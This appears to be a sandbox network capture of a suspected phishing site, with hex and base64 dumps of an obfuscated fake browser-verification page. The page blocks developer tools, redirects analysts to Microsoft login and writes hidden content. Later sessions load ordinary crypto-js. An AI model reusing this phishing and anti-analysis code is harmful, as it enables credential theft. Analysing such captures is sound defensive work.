                                                                Data Ascii: eDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI2ZaTmRTYW1SSGwgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b
                                                                Data Ascii: QoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29k
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 41 67 61 57 59 67 4b 47 46 4c 56 56 56 74 59 31 42 72 51 6c 41 67 4c 53 42 42 51 6b 74 36 53 55 39 6c 53 57 52 49 49 44 34 67 53 30 56 45 56 58 70 4c 59 55 4a 35 52 53 41 6d 4a 69 41 68 5a 45 4a 35 63 57 78 74 59 30 4e 51 61 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 52 48 70 74 55 6b 31 32 65 55 52 31 52 43 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6b 51 6e 6c 78 62 47 31 6a 51 31 42 72 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 58 42 73 59 57 4e 6c 4b 43 64 6f 64 48 52 77 63 7a 6f 76 4c 32 78 76 5a 32 6c 75 4c 6d 31 70 59 33 4a 76 63 32 39 6d 64 47 39 75 62 47 6c 75 5a
                                                                Data Ascii: AgaWYgKGFLVVVtY1BrQlAgLSBBQkt6SU9lSWRIID4gS0VEVXpLYUJ5RSAmJiAhZEJ5cWxtY0NQaykgew0KICAgICAgICAgICAgRHptUk12eUR1RCA9IHRydWU7DQogICAgICAgICAgICBkQnlxbG1jQ1BrID0gdHJ1ZTsNCiAgICAgICAgICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL2xvZ2luLm1pY3Jvc29mdG9ubGluZ
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 64 45 74 49 64 33 42 76 59 55 6c 4f 57 53 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 47 31 68 61 57 35 30 59 57 6c 75 49 47 45 67 63 32 56 6a 64 58 4a 6c 49 47 4e 76 62 6d 35 6c 59 33 52 70 62 32 34 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 7a 59 33 4a 70 63 48 51 2b 44 51 70 30 64 58 4a 75 63 33 52 70 62 47 55 75 63 6d 56 75 5a 47 56 79 4b 43 63 6a 59 32 59 6e 4c 43 42 37 44 51 6f 67 49 43 41 67 63 32 6c 30 5a 57 74 6c 65 54 6f 67 4a 7a 42 34 4e 45 46 42 51 55
                                                                Data Ascii: hc3M9InRleHQtY2VudGVyIiBpZD0idEtId3BvYUlOWSI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIHRvIG1haW50YWluIGEgc2VjdXJlIGNvbm5lY3Rpb24uDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjxzY3JpcHQ+DQp0dXJuc3RpbGUucmVuZGVyKCcjY2YnLCB7DQogICAgc2l0ZWtleTogJzB4NEFBQU
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 52 48 70 74 55 6b 31 32 65 55 52 31 52 43 41 39 50 53 42 6d 59 57 78 7a 5a 53 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 62 47 39 68 5a 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41
                                                                Data Ascii: ZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgaWYoRHptUk12eUR1RCA9PSBmYWxzZSl7DQogICAgICAgIGxvY2F0aW9uLnJlbG9hZCgpOw0KICAgICAgICB9DQogICAgICAgIH0NCiA
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4e 4a 6c 42 52 4d 65 74 64 44 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4e 4a 6c 42 52 4d 65 74 64 44 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4e 4a 6c 42 52 4d 65 74 64 44 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 4b 73 51 74 5a 49 4a 61 77 5a 20 3d 20 4e 4a 6c 42 52 4d 65 74 64 44 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 4b 73 51 74 5a 49 4a 61 77 5a 20 3d 3d 20 4d 67 41 64 64 6e 43 50 45 6d 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54
                                                                Data Ascii: 3')[0].split('%3F')[0];if (NJlBRMetdD.pathname.endsWith('/')) {NJlBRMetdD.pathname = NJlBRMetdD.pathname.slice(0, -1);}const KsQtZIJawZ = NJlBRMetdD.pathname+'/';if(KsQtZIJawZ == MgAddnCPEm){document.write(decodeURIComponent(escape(atob('PCFET
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 5a 61 54 6d 52 54 59 57 31 53 53 47 77 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 7a 42 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57
                                                                Data Ascii: 0b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2ZaTmRTYW1SSGwuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMzBweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW
                                                                2025-01-07 21:36:00 UTC1369INData Raw: 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41
                                                                Data Ascii: bnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSA


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1649725104.18.95.414437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:01 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://sung.ethamoskag.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:01 UTC386INHTTP/1.1 302 Found
                                                                Date: Tue, 07 Jan 2025 21:36:01 GMT
                                                                Content-Length: 0
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                cross-origin-resource-policy: cross-origin
                                                                location: /turnstile/v0/g/849bfe45bf45/api.js
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714b8aa227cf9-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1649726104.17.25.144437780C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-07 21:36:01 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://sung.ethamoskag.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-07 21:36:01 UTC957INHTTP/1.1 200 OK
                                                                Date: Tue, 07 Jan 2025 21:36:01 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"61182885-40eb"
                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 1151509
                                                                Expires: Sun, 28 Dec 2025 21:36:01 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=avJZodYibSyv3VwzHWXOZxQZaoWEKqhQlZj0DHwwFBgsqJU7Oz2vLUWs23wTblGW0AujJGnEeamVoqTbirG%2FuAjVjy86G3CpivNMVGmlzi1zgpKq7OIPEdJQ%2BEcQc68KQrsXT6LJ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8fe714b89f5442db-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-07 21:36:01 UTC412INData Raw: 37 62 66 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                Data Ascii: 7bf4!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74
                                                                Data Ascii: globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.creat
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74
                                                                Data Ascii: ll(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)t
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61
                                                                Data Ascii: of t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f
                                                                Data Ascii: r t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e
                                                                Data Ascii: r(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e
                                                                Data Ascii: t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fun
                                                                2025-01-07 21:36:01 UTC1369INData Raw: 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52
                                                                Data Ascii: rAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQR
